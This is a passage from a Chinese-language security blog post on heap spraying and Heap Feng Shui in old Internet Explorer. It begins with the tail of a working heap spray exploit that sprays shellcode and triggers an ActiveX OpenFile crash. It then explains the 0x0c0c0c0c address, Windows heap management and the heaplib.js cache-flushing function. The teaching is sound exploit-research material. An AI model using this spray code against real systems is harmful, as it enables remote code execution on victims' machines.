&lt; 0x40000) chunk = chunk + chunk + filler;</span><br><span class="line">	var memory = new Array();</span><br><span class="line">	for (i = 0; i &lt; 500; i++)&#123; memory[i] = chunk + Shellcode &#125;</span><br><span class="line">	</span><br><span class="line">	// Trigger crash =&gt;EIP == 0x06060606</span><br><span class="line">	pointer=&apos;&apos;;</span><br><span class="line">	for (counter=0; counter&lt;=1000; counter++) pointer+=unescape(&quot;%06&quot;);</span><br><span class="line">	Oops.OpenFile(pointer);</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>最终执行效果如下：<br><img src="/images/FromHeapSprayToHeapFengShui/HeapSpray_exp1_3.PNG" alt="最终执行效果"></p>
<h2><span id="为什么是-0x0c0c0c0c">为什么是 0x0c0c0c0c?</span></h2><p>关于 0x0c0c0c0c 这个地址有很多讨论。</p>
<p>一是因为堆的分布不均衡（存在碎片），所以最先分配的一些堆块的地址可能是无规律的，但是如果大量的分配堆块的话，那么就会出现稳定的地址分布。也就是说内存中碎片过多，必须喷射到更高的地址才能使 exploit 更稳定。利用JavaScript申请大量堆内存，通常申请的内存超过200MB(0xc800000)后，0x0c0c0c0c 将被含有shellcode 的内存片覆盖。只要内存片中的 0x90 能够命中0x0c0c0c0c的位置,shellcode就能最终得到执行！</p>
<p>二则涉及虚函数和多级指针。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line">* file name: vtable_demo.cpp</span><br><span class="line">* vs2017</span><br><span class="line">*/</span><br><span class="line">#include &lt;cstdio&gt;</span><br><span class="line"></span><br><span class="line">using namespace std;</span><br><span class="line"></span><br><span class="line">class CVirtual &#123;</span><br><span class="line">private:</span><br><span class="line">	int m_nNumber;</span><br><span class="line">public:</span><br><span class="line">	virtual int GetNumber() &#123;</span><br><span class="line">		return m_nNumber;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	virtual void SetNumber(int nNumber) &#123;</span><br><span class="line">		m_nNumber = nNumber;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">int main(int argc, char *argv[]) &#123;</span><br><span class="line">	CVirtual MyVirtual;</span><br><span class="line">	MyVirtual.SetNumber(argc);</span><br><span class="line">	printf(&quot;%d\r\t&quot;, MyVirtual.GetNumber());</span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>对虚表初始化调试如下图：<br><img src="/images/FromHeapSprayToHeapFengShui/vtable_1.png" alt="虚表初始化调试"><br>可以看到 this == 0xaffc98,存储着 vfptr== 0x1367b34,m_nNumber</p>
<p>vfptr 指向的区域存储着两个函数指针，&amp;GetNumber == 0x13611cc;  &amp;SetNumber == 0x1361082</p>
<p>this 对象和虚表关系示意图<br><img src="/images/FromHeapSprayToHeapFengShui/vtable_2.png" alt="虚表初始化调试"></p>
<p>在之前的编译器中，调用对象的虚函数汇编指令可能是形如以下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; this</span><br><span class="line">MOV EAX,DWORD PTR SS:[EBP+8]</span><br><span class="line">; vfptr</span><br><span class="line">MOV EDX,DWORD PTR DS:[EAX]</span><br><span class="line">; call function</span><br><span class="line">MOV EAX,[EDX+4]</span><br><span class="line">CALL EAX</span><br></pre></td></tr></table></figure></p>
<p>那么这样就有问题，如果能控制最初的指针，确保在喷射后，内存地址 0x0c0c0c0c 也包含有 0x0c0c0c0c，那么就可以形成如下的指令序列:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; this</span><br><span class="line">MOV EAX,DWORD PTR SS:[EBP+8] &lt;- put 0x0c0c0c0c in eax</span><br><span class="line">; vfptr</span><br><span class="line">MOV EDX,DWORD PTR DS:[EAX] &lt;- put 0x0c0c0c0c in edx</span><br><span class="line">; call function</span><br><span class="line">MOV EAX,[EDX+4] &lt;- put 0x0c0c0c0c in eax</span><br><span class="line">CALL EAX &lt;- jump to 0x0c0c0c0c</span><br></pre></td></tr></table></figure></p>
<p>而 0x0c0c0c0c 如果作为指令是 or al,0x0c，在任何时候都不会直接引发异常，这样就可被当作 sled 指令也不会影响执行的。</p>
<p>当然最新的编译器 ( VS2017 ) 一般都是如下图的:<br><img src="/images/FromHeapSprayToHeapFengShui/Call_vf.PNG" alt="VS2017 调用对象虚函数"></p>
<h1><span id="heapfengshui">HeapFengShui</span></h1><p>“HeapFengShui” 是由 Alexander Sotirov 提出来的。</p>
<p>他认为传统的堆喷射由于堆中内存由于 Heap cache 机制难以预测，利用不稳定且资源消耗大。因此提出了一种新的可靠且精准的利用方法。并且实现了 heaplib.js 库，使得 heap spray 更易实现。</p>
<p>IE 中涉及内存分配的组件有三个：</p>
<ul>
<li>mshtml.dll</li>
<li>jscript.dll</li>
<li>ActiveX 控制器</li>
</ul>
<h2><span id="windows-堆管理策略简述">Windows 堆管理策略简述</span></h2><p>得益于前人研究。与 Linux 下类似，Windows 用 chunk table 来管理和索引堆区中所有的空闲堆 chunk 的重要信息。chunk table 一般位于堆区的起始位置。一般分：</p>
<ul>
<li>Freelist- 空闲双向链表，空表，前端分配器</li>
<li>Lookaside- 快速单向链表，快表，heap chunk 不会发生合并，空闲 chunk header 被设置为 inuse，后端分配器</li>
</ul>
<p>其分配和释放规则如下：<br>|   |  分配   |  释放  |<br>| ——–   | :—–:   | :—-: |<br>| 小块  | 首先进行快表分配；若快表分配失败，进行普通空表分配；<br>若普通空表分配失败，使用堆缓存分配；<br>若堆缓存分配失败，尝试零号空表分配(freelist[0])；<br>若零号空表分配失败，进行内存紧缩后在尝试分配；<br>若仍无法分配，返回NULL |  优先链入快表(只能链入4个空闲块)；<br>如果快表满，则将其链入相应的空表 |<br>| 大块  | 首先使用堆缓存进行分配；<br>若堆缓存分配失败，使用free[0]中的大块进行分配    |   优先将其放入堆缓存；<br>若堆缓存满，将链入freelist[0]    |<br>| 巨块  | 要用到虚分配方法(实际上并不是从堆区分配的)    |   直接释放，没有堆表操作    |</p>
<h2><span id="oleaut32dll-的-heap-cache-机制">oleaut32.dll 的 heap cache 机制</span></h2><p>oleaut32.dll 这个引擎管理内存实现快速分配/再分配。32767 bytes 大小以上的块会直接被释放掉，并且不会被缓存。</p>
<p>缓存管理表按块大小排序组织。每一小块 “bin” 在缓存表里可以保存堆块的数值。有4种 “bin” :<br>| Bin  | Size Of Blocks this bin can hold<br>| ——–   | :—–:<br>| 0  | 1 to 32 bytes<br>| 1  | 33 to 64 bytes<br>| 2  | 65 to 256 bytes<br>| 3  | 257 to 32768 bytes<br>每一个 bin 可容纳 6 个指针</p>
<h2><span id="plunger-技术-绕过-oleaut32dll-的缓存机制">Plunger 技术 - 绕过 oleaut32.dll 的缓存机制</span></h2><p>理想的情况下，做堆喷射时，我们要确保我们的分配是由系统堆处理。通过这种方式，基于堆的可预测性的特点，连续申请会导致在同一内存地点的连续内存空间。</p>
<p>而缓存管理器返回的地址可以在堆里面的任何地方，所以地址将是不可靠的。</p>
<p>由于缓存中每个 bin 只能容纳 6 个地址，Mr.Sotirov 提出了 “plunger” 的技术，其刷新缓存中的所有块，并让他们空下来。如果缓存中没有块，缓存不能分配任何块还给你，所以确保你的内存申请使用的是系统堆，而不是 oleaut32 中的堆。这将增加获得连续内存块的可预见性。</p>
<p>为了做到这一点，他只试图申请缓存列表中的6块（1和32之间的大小的内存块申请6块，6块大小33和64之间，并为每个bin依此类推）。这样一来，确保了缓存是空的。“刷新”后发生的分配，将由系统堆处理。</p>
<p>具体代码在 heaplib.js 中 heaplib flush function 实现如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">//</span><br><span class="line">// The JScript interpreter uses the OLEAUT32 memory allocator for all string</span><br><span class="line">// allocations. This allocator stores freed blocks in a cache and reuses them</span><br><span class="line">// for later allocations. The cache consists of 4 bins, each storing up to 6</span><br><span class="line">// blocks. Each bin holds blocks of a certain size range:</span><br><span class="line">//</span><br><span class="line">//    0 - 32</span><br><span class="line">//    33 - 64</span><br><span class="line">//    65 - 256</span><br><span class="line">//    257 - 32768</span><br><span class="line">//</span><br><span class="line">// When a block is freed by the OLEAUT32 free function, it is stored in one of</span><br><span class="line">// the bins. If the bin is full, the smallest block in the bin is freed with</span><br><span class="line">// RtlFreeHeap() and is replaced with the new block. Chunks larger than 32768</span><br><span class="line">// bytes are not cached and are freed directly.</span><br><span class="line">//</span><br><span class="line">// To flush the cache, we need to free 6 blocks of the maximum size for each</span><br><span class="line">// bin. The maximum size blocks will push out all smaller blocks from the</span><br><span class="line">// cache. Then we allocate the maximum size blocks again, leaving the cache</span><br><span class="line">// empty.</span><br><span class="line">//</span><br><span class="line">// You need to call this function once to allocate the maximum size blocks</span><br><span class="line">// before you can use it to flush the cache.</span><br><span class="line">//</span><br><span class="line"></span><br><span class="line">heapLib.ie.prototype.flushOleaut32 = function() &#123;</span><br><span class="line"></span><br><span class="line">	this.debug(&quot;Flushing the OLEAUT32 cache&quot;);</span><br><span class="line">	</span><br><span class="line">	// Free the maximum size blocks and push out all smaller blocks</span><br><span class="line">	</span><br><span class="line">	this.freeOleaut32(&quot;oleaut32&quot;);</span><br><span class="line">	</span><br><span class="line">	// Allocate the maximum sized blocks again, emptying the cache</span><br><span class="line"></span><br><span class="line">	for (var i = 0; i &lt; 6; i++) &#123;</span><br><span class="line">		this.allocOleaut32(32, &quot;oleaut32&quot;);</span><br><span class="line">		this.allocOleaut32(64, &quot;oleaut32&quot;);</span><br><span class="line">		this.allocOleaut32(256, &quot;oleaut32&quot;);</span><br><span class="line">		this.allocOleaut32(32768, &quot;oleaut32&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>结合 “plunger” 技术，在任意时刻调用 GC，申请给定大小的内存块，进一步可以尝试整理堆，填补堆布局中的所有空隙，那么这样就可以保证在分配的时候堆内存是连续的。</p>
<h1><span id="reference">Reference</span></h1><ul>
<li>Alexander Sotirov.Heap Feng Shui in JavaScript.Black Hat Europe.2007</li>
<li>Exploit writing tutorial part 11 : Heap Spraying Demystified: <a href="https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/" target="_blank" rel="noopener">https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/</a></li>
<li>[翻译]Windows Exploit开发系列教程第八部分：堆喷射第一节[覆写EIP]: <a href="https://bbs.pediy.com/thread-207158.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-207158.htm</a></li>
<li>[翻译]Windows exploit开发系列教程第九部分：堆喷射[第二章：UAF]—大海捞针(Finding a needle in a Haystack): <a href="https://bbs.pediy.com/thread-225210.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-225210.htm</a></li>
<li>IE浏览器漏洞综合利用技术：堆喷射技术：<a href="https://bbs.pediy.com/thread-223106.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-223106.htm</a></li>
<li>Heap Spray 技术要点：<a href="https://bbs.pediy.com/thread-156991.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-156991.htm</a></li>
</ul>

      
    </div>

    <div>
      
        
      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Heap/" rel="tag">#Heap</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/10/21/srop_detail/" rel="next" title="srop 利用方式">
                <i class="fa fa-chevron-left"></i> srop 利用方式
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Asan">
          <p class="site-author-name" itemprop="name">Asan</p>
          <p class="site-description motion-element" itemprop="description">Asanzjx Personal Blog</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">43</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">57</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/asanzjx" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#undefined"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#undefined"><span class="nav-number">2.</span> <span class="nav-text">HeapSpray</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">2.1.</span> <span class="nav-text">基于 js 的内存分配</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.1.1.</span> <span class="nav-text">BSTR 字符串对象验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.1.2.</span> <span class="nav-text">jscript unescape() 验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.1.3.</span> <span class="nav-text">js 的垃圾回收机制</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">2.2.</span> <span class="nav-text">XP+IE6 HeapSpray</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">2.3.</span> <span class="nav-text">观察 spray 过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.3.1.</span> <span class="nav-text">vmmap for windows</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.3.2.</span> <span class="nav-text">ImmunityDebugger+mona</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.3.3.</span> <span class="nav-text">Windbg 查看调试情况</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">2.4.</span> <span class="nav-text">利用 HeapSpray 实现 exp</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.4.1.</span> <span class="nav-text">崩溃重现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.4.2.</span> <span class="nav-text">分析第一个异常文件 1788900268.wsf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.4.3.</span> <span class="nav-text">转换成 js 脚本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.4.4.</span> <span class="nav-text">调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#undefined"><span class="nav-number">2.4.5.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">2.5.</span> <span class="nav-text">为什么是 0x0c0c0c0c?</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#undefined"><span class="nav-number">3.</span> <span class="nav-text">HeapFengShui</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">3.1.</span> <span class="nav-text">Windows 堆管理策略简述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">3.2.</span> <span class="nav-text">oleaut32.dll 的 heap cache 机制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#undefined"><span class="nav-number">3.3.</span> <span class="nav-text">Plunger 技术 - 绕过 oleaut32.dll 的缓存机制</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#undefined"><span class="nav-number">4.</span> <span class="nav-text">Reference</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Asan</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  

    <script type="text/javascript">
      var disqus_shortname = 'asanzjx';
      var disqus_identifier = '2018/11/27/FromHeapSprayToHeapFengShui/';
      var disqus_title = "从 HeapSpray( 堆喷射 ) 到 HeapFengShui( 堆风水 )";
      var disqus_url = 'https://asanzjx.github.io/2018/11/27/FromHeapSprayToHeapFengShui/';

      function run_disqus_script(disqus_script){
        var dsq = document.createElement('script');
        dsq.type = 'text/javascript';
        dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/' + disqus_script;
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
      }

      run_disqus_script('count.js');
      
        run_disqus_script('embed.js');
      
    </script>
  




  
  
  

  

  

</body>
</html>
